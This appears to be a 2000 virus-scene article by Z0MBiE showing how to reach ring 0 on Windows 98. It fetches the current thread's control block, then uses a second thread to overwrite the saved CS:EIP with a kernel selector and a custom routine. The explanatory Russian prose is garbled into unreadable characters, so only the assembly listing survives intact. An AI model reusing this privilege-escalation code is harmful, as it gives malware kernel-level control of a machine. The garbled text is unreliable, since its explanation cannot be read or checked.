
                         win98:  ring-0 १ TCB
                         -------------------------

                              (x) 2000 Z0MBiE
                           http://z0mbie.cjb.net

     襬    ।⠢  ।  ᯮᮡ  室  ring0,
 ࠢ ⮫쪮  win98.      ।  win9X.

       砥    ᫥饬.      (thread)  
 ,  뢠  TCB (Thread Control Block).   ᮤন
    类   ᭮  ଠ樨,  ਬ    ॣ஢,   
 ⭮, CS:EIP.   win9X, TCB, ᠬ ᮡ,  ய.

        TCB? ⢥ म TCB  㤮 ᨣ: 'THCB'.
   ᪠ 直 ⮩   㦥, ⭮ , , ⮬ 
 win98  ᤥ ⠪:

                        mov     eax, 4Fh    ; 4Fh/93h: i2E_xxGetCurrentThread
                        int     2Eh
                        mov     eax, [eax]  ; EAX <-- current TCB
                        mov     save_tcbptr, eax

       ᪠,   ய CS:EIP  ⥪饩     -- 
 ⮥, ⠪  ᮧ  ⮣  .

                        push    offset tid      ; *ThreadId
                        push    0               ; flags
                        push    12345678h       ; parameter
                        push    offset newthread; address
                        push    0               ; stack size. 0==same
                        push    0
                        callW   CreateThread

     , ਮ⠭ ⥪ , ⮡ 믮  ᮧ:

                        push    1               ; while threads switching
                        callW   Sleep

      ,  㦥 뢠  㫥.   ந室   ?

newthread:              pusha

                        mov     eax, save_tcbptr                ; main TCB
                        mov     eax, [eax].TCB_ClientPtr        ; registers

                        lea     ecx, ring0
                        xchg    ecx, [eax].Client_EIP           ; EIP
                        mov     save_eip, ecx

                        mov     ecx, 28h ; std. win9x ring0 selector
                        xchg    cx, [eax].Client_CS             ; CS
                        mov     save_cs, ecx

                        popa
                        retn

       ,      CS:EIP    ᢮  ᮡ⢥.   ⠪
 룫廊 楤,    ࠢ  㫥:

ring0:                  pusha
                        push    ds es

                        mov     eax, ss
                        mov     ds, eax
                        mov     es, eax

                        ;  ⠢ 䠪 

                        pop     es ds
                        popa

                        push    cs:save_cs
                        push    cs:save_eip
                        retf

     , ᮡ⢥,  .   祣 ?
